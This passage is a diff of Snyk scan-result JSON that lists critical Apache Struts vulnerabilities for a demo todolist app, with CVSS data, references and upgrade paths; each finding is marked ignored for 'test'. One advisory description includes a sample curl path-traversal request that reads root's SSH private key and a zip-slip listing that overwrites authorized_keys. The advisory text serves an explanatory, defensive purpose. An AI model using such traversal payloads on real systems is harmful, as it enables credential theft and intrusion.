"2024-08-08T12:48:34.932Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30771", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2,2.3.20.2)", + "[2.3.24,2.3.24.2)", + "[2.3.28,2.3.28.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.20.2", + "2.3.24.2", + "2.3.28.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/6bd694b7980494c12d49ca1bf39f12aec3e03e2f", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3082", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:47.685356Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:39.390655Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:47.685356Z" + } + ], + "description": "## Overview\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22) is a free open-source solution for creating Java web applications.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. It allows remote attackers to execute arbitrary code via the stylesheet location parameter.\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.20.2, 2.3.24.2, 2.3.28.1 or higher.\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3082)", + "epssDetails": { + "percentile": "0.99401", + "probability": "0.95903", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3082" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.327000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-04-22T02:36:52.273000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-04-22T02:36:52.273000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:47.685356Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.20.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:49:09.757Z", + "expires": "2024-08-08T12:49:09.570Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30772", + "title": "Arbitrary Command Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2,2.3.20.2)", + "[2.3.24,2.3.24.3)", + "[2.3.28,2.3.28.1)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.20.2", + "2.3.24.3", + "2.3.28.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://exploit-db.com/exploits/39919", + "title": "Exploit DB" + }, + { + "url": "https://github.com/apache/struts/commit/6bd694b7980494c12d49ca1bf39f12aec3e03e2f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/98d2692e434fe7f4d445ade24fe2c9860de1c13f", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3087", + "title": "NVD" + }, + { + "url": "https://www.exploit-db.com/exploits/39919", + "title": "Exploit DB" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:49.896841Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:39.893991Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:49.896841Z" + } + ], + "description": "## Overview\r\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22)\r\nApache Struts 2.3.20.x before 2.3.20.3, 2.3.24.x before 2.3.24.3, and 2.3.28.x before 2.3.28.1, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via vectors related to an ! (exclamation mark) operator to the REST Plugin.\r\n\r\n## References\r\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3087)", + "epssDetails": { + "percentile": "0.97435", + "probability": "0.46493", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3087" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.339000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-02T00:40:36Z", + "exploitDetails": { + "sources": [ + "ExploitDB", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-06-02T00:40:36Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:12.756827Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.20.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:48:38.078Z", + "expires": "2024-08-08T12:48:37.849Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30778", + "title": "Directory Traversal", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[2.3.20,2.3.31)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.31" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "http://struts.apache.org/docs/s2-042.html", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/apache/struts/commit/030ffa33543f8953306ed0c0dc815c7fb74d7129", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/8e67b9144aa643769b261e2492cb561e04d016ab", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:03.921305Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:32.508677Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:03.921305Z" + } + ], + "description": "## Overview\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22)\nAffected versions of the package are vulnerable to Directory Traversal.\n\n## Details\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\r\n\r\nDirectory Traversal vulnerabilities can be generally divided into two types:\r\n\r\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\r\n\r\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\r\n\r\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\r\n\r\n```\r\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\r\n```\r\n**Note** `%2e` is the URL encoded version of `.` (dot).\r\n\r\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \r\n\r\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\r\n\r\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\r\n\r\n```\r\n2018-04-15 22:04:29 ..... 19 19 good.txt\r\n2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\r\n```\n\n\n## References\n- [Apache Security Advisory](http://struts.apache.org/docs/s2-042.html)\n", + "epssDetails": { + "percentile": "0.89019", + "probability": "0.02019", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-6795" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.415000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-10-19T01:09:09.263000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-10-19T01:09:09.263000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:03.921305Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.31" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:49:14.737Z", + "expires": "2024-08-08T12:49:14.556Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31503", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "credit": [ + "Lupin", + "David Greene", + "Roland McIntosh" + ], + "semver": { + "vulnerable": [ + "[,2.3.34)", + "[2.4,2.5.12)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + "2.3.34", + "2.5.12" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-053", + "title": "Apache Security Bulletin" + }, + { + "url": "https://github.com/brianwrf/S2-053-CVE-2017-12611", + "title": "Exploit" + }, + { + "url": "https://github.com/apache/struts/commit/2306f5f7fad7f0157f216f34331238feb0539fa", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/637ad1c3707266c33daabb18d7754e795e6681f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2017/CVE-2017-12611.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:50.788695Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:06:02.858095Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:50.788695Z" + } + ], + "description": "## Overview\r\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\r\n\r\nAffected versions of this package are vulnerable to arbitrary code execution. Using expression literals or forcing expressions in Freemarker tags (see example snippet below), and using request values can lead to remote code execution.\r\n\r\n```xml\r\n<@s.hidden name=\"redirectUri\" value=redirectUri />\r\n<@s.hidden name=\"redirectUri\" value=\"${redirectUri}\" />\r\n<@s.hidden name=\"${redirectUri}\"/>\r\n```\r\n\r\nIn both cases a writable property is used in the value attribute and in both cases this is treated as an expression by Freemarker. Please be aware that using Struts expression evaluation style is safe:\r\n\r\n```\r\n<@s.hidden name=\"redirectUri\" value=\"%{redirectUri}\" />\r\n<@s.hidden name=\"%{redirectUri}\"/>\r\n```\r\n\r\n## Remediation\r\nDevelopers are strongly advised to upgrade their _Apache Struts_ components to version `2.3.34`, `2.5.12` or higher.\r\n\r\n## References\r\n- [Apache Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-053)", + "epssDetails": { + "percentile": "0.99858", + "probability": "0.97300", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-12611" + ], + "CWE": [ + "CWE-20", + "CWE-502" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-09-06T17:28:23.339000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2017-09-05T17:28:23Z", + "exploitDetails": { + "sources": [ + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2017-09-06T17:28:23Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:22.617066Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.34" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:48:49.330Z", + "expires": "2024-08-08T12:48:49.098Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-451610", + "title": "Improper Action Name Cleanup", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.3.29)", + "[2.5, 2.5.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.29", + "2.5.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/237432512df0e27013f7c7b9ab59fdce44ca34a5", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/27ca165ddbf81c84bafbd083b99a18d89cc49ca7", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:52.582114Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:23.840033Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:52.582114Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Improper Action Name Cleanup. It allowed attackers to have unspecified impact via vectors related to improper action name clean up.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29, 2.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/237432512df0e27013f7c7b9ab59fdce44ca34a5)\n- [GitHub Commit](https://github.com/apache/struts/commit/27ca165ddbf81c84bafbd083b99a18d89cc49ca7)\n", + "epssDetails": { + "percentile": "0.89903", + "probability": "0.02365", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4436" + ], + "CWE": [ + "CWE-459" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2019-07-16T11:14:42.540198Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-09-19T05:25:51Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-09-19T05:25:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:52.582114Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:49:12.566Z", + "expires": "2024-08-08T12:49:12.322Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-608097", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C", + "credit": [ + "Matthias Kaiser" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.5.22)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + "2.5.22" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://www.exploit-db.com/exploits/49068", + "title": "Exploit" + }, + { + "url": "https://github.com/PrinceFPF/CVE-2019-0230", + "title": "Proof Of Concept" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-059", + "title": "Security Bulletin" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2019/CVE-2019-0230.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:13.645371Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:03.579407Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:00:34.752855Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:13.645371Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:03.579407Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE). Forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.22 or higher.\n## References\n- [Exploit](https://www.exploit-db.com/exploits/49068)\n- [Proof Of Concept](https://github.com/PrinceFPF/CVE-2019-0230)\n- [Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-059)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2019/CVE-2019-0230.yaml)\n", + "epssDetails": { + "percentile": "0.99361", + "probability": "0.95346", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-0230" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2020-08-21T14:31:35.397242Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-08-11T14:14:01Z", + "exploitDetails": { + "sources": [ + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2020-08-21T14:06:54Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:22.021057Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.22" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:48:52.394Z", + "expires": "2024-08-08T12:48:52.149Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-6102825", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "Steven Seeley" + ], + "semver": { + "vulnerable": [ + "[,2.5.33)", + "[6.0.0,6.3.0.2)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.5.33", + "6.3.0.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://lists.apache.org/thread/yh09b3fkf6vz5d6jdgrlvmg60lfwtqhj", + "title": "Apache Mailing List" + }, + { + "url": "https://www.akamai.com/blog/security-research/apache-struts-cve-exploitation-attempts", + "title": "Exploitation Attempts" + }, + { + "url": "https://github.com/apache/struts/commit/162e29fee9136f4bfd9b2376da2cbf590f9ea163", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/d8c69691ef1d15e76a5f4fcf33039316da2340b6", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/wy876/POC/blob/main/Apache%20Struts2%20CVE-2023-50164.md", + "title": "PoC" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-066", + "title": "Struts Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:54:10.322561Z" + }, + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:54:10.688470Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-07-23T07:46:17.121104Z" + }, + { + "type": "secondary", + 